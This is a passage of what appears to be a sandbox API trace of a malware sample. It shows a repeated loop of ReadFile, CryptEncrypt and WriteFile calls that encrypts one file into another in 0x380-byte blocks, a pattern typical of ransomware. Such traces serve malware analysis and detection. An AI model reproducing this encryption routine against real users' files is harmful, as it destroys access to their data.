nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.605] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.606] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.606] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.607] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.607] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.608] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.608] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.609] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.609] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.609] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.609] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.609] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.610] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.610] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.611] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.611] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.612] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.612] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.612] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.612] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.612] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.612] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.612] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.613] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.613] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 